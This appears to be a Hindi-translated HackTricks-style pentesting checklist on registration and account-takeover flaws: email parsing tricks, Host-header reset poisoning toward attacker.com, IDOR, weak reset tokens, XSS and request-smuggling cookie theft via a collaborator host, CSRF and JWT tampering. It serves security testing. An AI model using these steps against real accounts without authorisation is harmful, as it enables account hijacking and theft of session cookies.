Registration & Takeover Vulnerabilities
Last updated
Last updated
AWS हैकिंग सीखें और अभ्यास करें: GCP हैकिंग सीखें और अभ्यास करें:
एक मौजूदा उपयोगकर्ता नाम का उपयोग करके जनरेट करने का प्रयास करें
ईमेल को बदलने की जांच करें:
अपरकेस
+1@
ईमेल में कुछ डॉट जोड़ें
ईमेल नाम में विशेष वर्ण (%00, %09, %20)
ईमेल के बाद काले वर्ण डालें: test@test.com a
victim@gmail.com@attacker.com
victim@attacker.com@gmail.com
जांचें कि क्या आप पता लगा सकते हैं कि कब एक उपयोगकर्ता नाम पहले से ही एप्लिकेशन के अंदर पंजीकृत है।
एक उपयोगकर्ता बनाने पर पासवर्ड नीति की जांच करें (जांचें कि क्या आप कमजोर पासवर्ड का उपयोग कर सकते हैं)। इस मामले में आप क्रेडेंशियल्स को ब्रूटफोर्स करने का प्रयास कर सकते हैं।
जब पंजीकृत हों तो ईमेल बदलने का प्रयास करें और जांचें कि क्या यह परिवर्तन सही ढंग से मान्य है या इसे मनमाने ईमेल में बदल सकते हैं।
जांचें कि क्या आप निष्क्रिय ईमेल का उपयोग कर सकते हैं
लंबा पासवर्ड (>200) DoS की ओर ले जाता है
खाता निर्माण पर दर सीमाओं की जांच करें
username@burp_collab.net का उपयोग करें और कॉलबैक का विश्लेषण करें
अपने ईमेल पते पर पासवर्ड रीसेट का अनुरोध करें
पासवर्ड रीसेट लिंक पर क्लिक करें
पासवर्ड न बदलें
किसी भी 3rd पार्टी वेबसाइटों पर क्लिक करें (जैसे: फेसबुक, ट्विटर)
Burp Suite प्रॉक्सी में अनुरोध को इंटरसेप्ट करें
जांचें कि क्या रेफरर हेडर पासवर्ड रीसेट टोकन लीक कर रहा है।
Burp Suite में पासवर्ड रीसेट अनुरोध को इंटरसेप्ट करें
Burp Suite में निम्नलिखित हेडर जोड़ें या संपादित करें: Host: attacker.com
, X-Forwarded-Host: attacker.com
संशोधित हेडर के साथ अनुरोध को अग्रेषित करें
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
host header के आधार पर पासवर्ड रीसेट URL की तलाश करें जैसे: https://attacker.com/reset-password.php?token=TOKEN
हमलावर को अपने खाते में लॉगिन करना होगा और पासवर्ड बदलें फीचर पर जाना होगा।
बर्प सुइट शुरू करें और अनुरोध को इंटरसेप्ट करें।
इसे रिपीटर टैब में भेजें और पैरामीटर संपादित करें: उपयोगकर्ता आईडी/ईमेल
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})
पासवर्ड रीसेट टोकन को हर बार यादृच्छिक रूप से उत्पन्न और अद्वितीय होना चाहिए। यह निर्धारित करने की कोशिश करें कि क्या टोकन समाप्त होता है या यह हमेशा समान होता है, कुछ मामलों में उत्पन्न करने का एल्गोरिदम कमजोर होता है और इसे अनुमानित किया जा सकता है। निम्नलिखित चर एल्गोरिदम द्वारा उपयोग किए जा सकते हैं।
टाइमस्टैम्प
उपयोगकर्ता आईडी
उपयोगकर्ता का ईमेल
पहला नाम और अंतिम नाम
जन्म तिथि
क्रिप्टोग्राफी
केवल संख्या
छोटा टोकन अनुक्रम (अक्षर [A-Z,a-z,0-9] के बीच)
टोकन पुन: उपयोग
टोकन समाप्ति तिथि
एक विशिष्ट ईमेल के लिए API/UI का उपयोग करके पासवर्ड रीसेट अनुरोध ट्रिगर करें, जैसे: test@mail.com
सर्वर प्रतिक्रिया का निरीक्षण करें और resetToken
की जांच करें।
फिर टोकन का उपयोग एक URL में करें जैसे https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
सिस्टम पर एक उपयोगकर्ता नाम के साथ पंजीकरण करें जो पीड़ित के उपयोगकर्ता नाम के समान हो, लेकिन उपयोगकर्ता नाम के पहले और/या बाद में खाली स्थान डाले गए हों। जैसे: "admin "
अपने दुर्भावनापूर्ण उपयोगकर्ता नाम के साथ पासवर्ड रीसेट का अनुरोध करें।
अपने ईमेल पर भेजे गए टोकन का उपयोग करें और पीड़ित का पासवर्ड रीसेट करें।
नए पासवर्ड के साथ पीड़ित खाते में लॉगिन करें।
एप्लिकेशन के अंदर या उपडोमेन में XSS खोजें यदि कुकीज़ माता-पिता डोमेन के लिए स्कोप की गई हैं: *.domain.com
वर्तमान सत्र कुकी लीक करें।
कुकी का उपयोग करके उपयोगकर्ता के रूप में प्रमाणीकरण करें।
1. smuggler का उपयोग करें ताकि HTTP अनुरोध स्मगलिंग के प्रकार का पता लगाया जा सके (CL, TE, CL.TE)
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. एक अनुरोध तैयार करें जो निम्नलिखित डेटा के साथ POST / HTTP/1.1
को ओवरराइट करेगा:
GET http://something.burpcollaborator.net HTTP/1.1 X:
जिसका लक्ष्य पीड़ितों को burpcollab पर ओपन रीडायरेक्ट करना और उनकी कुकीज़ चुराना है।
3. अंतिम अनुरोध निम्नलिखित जैसा दिख सकता है
CSRF के लिए एक पेलोड बनाएं, जैसे: “पासवर्ड परिवर्तन के लिए ऑटो सबमिट वाला HTML फॉर्म”
पेलोड भेजें
JSON वेब टोकन का उपयोग एक उपयोगकर्ता को प्रमाणित करने के लिए किया जा सकता है।
दूसरे उपयोगकर्ता आईडी / ईमेल के साथ JWT संपादित करें
कमजोर JWT हस्ताक्षर की जांच करें
यह सीखने के लिए कि कैसे खाता अधिग्रहण का प्रयास करें या पंजीकरण फॉर्म में SQL इंजेक्शन के माध्यम से जानकारी निकालें।
प्लेटफ़ॉर्म CTFd इस हमले के प्रति संवेदनशील था। देखें:
Hackerone रिपोर्ट इस बग का फायदा उठाते हुए * *
AWS हैकिंग सीखें और अभ्यास करें: GCP हैकिंग सीखें और अभ्यास करें:
की जांच करें!
हमारे 💬 या में शामिल हों या हमें Twitter 🐦 ** पर फॉलो करें।**
हैकिंग ट्रिक्स साझा करें और और गिटहब रिपोजिटरी में PR सबमिट करें।